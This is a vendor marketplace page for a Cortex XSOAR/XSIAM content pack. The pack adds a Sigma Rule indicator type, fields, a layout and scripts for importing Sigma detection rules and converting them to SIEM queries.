Skip to main content

Sigma

Download With Dependencies

This pack contains all needed objects to import and manage Sigma rules within Cortex TIM

Sigma

Overview

The Sigma Detection Rules content pack provides an integration with Sigma, a generic and open signature format for SIEM systems. This content pack enables you to create, manage, and utilize Sigma detection rules within Cortex TIM. Sigma rules allow you to describe relevant log events in a straightforward and universal format, which can be easily converted to SIEM-specific queries.

What does this pack do?

This new pack enables you to import Sigma rules either via a string or by a file into the Cortex TIM. Once in the system you can use the built-in scripts to convert the newly added rules into the format of your choice and use it to query 3rd party security products.

Content delivered with the content pack

  • An additional Cortex indicator type called "Sigma Rule".
  • All the relevant fields needed to store the data of the "Sigma Rule" indicator.
  • A new layout for the newly added indicator type.
  • Utility scripts needed to import Sigma rules and export them in the user chosen format.
Additional Information

For more information about Sigma and its uses, visit Sigma HQ.

Sigma

Overview

The Sigma Detection Rules content pack provides an integration with Sigma, a generic and open signature format for SIEM systems. This content pack enables you to create, manage, and utilize Sigma detection rules within Cortex TIM. Sigma rules allow you to describe relevant log events in a straightforward and universal format, which can be easily converted to SIEM-specific queries.

What does this pack do?

This new pack enables you to import Sigma rules either via a string or by a file into the Cortex TIM. Once in the system you can use the built-in scripts to convert the newly added rules into the format of your choice and use it to query 3rd party security products.

Content delivered with the content pack

  • An additional Cortex indicator type called "Sigma Rule".
  • All the relevant fields needed to store the data of the "Sigma Rule" indicator.
  • A new layout for the newly added indicator type.
  • Utility scripts needed to import Sigma rules and export them in the user chosen format.
Additional Information

For more information about Sigma and its uses, visit Sigma HQ.

PUBLISHER

PLATFORMS

Cortex XSOARCortex XSIAM

INFO

CertificationRead more
Supported ByCortex
CreatedSeptember 29, 2024
Last ReleaseOctober 10, 2024
WORKS WITH THE FOLLOWING INTEGRATIONS:
DISCLAIMER
Content packs are licensed by the Publisher identified above and subject to the Publisher’s own licensing terms. Palo Alto Networks is not liable for and does not warrant or support any content pack produced by a third-party Publisher, whether or not such packs are designated as “Palo Alto Networks-certified” or otherwise. For more information, see the Marketplace documentation.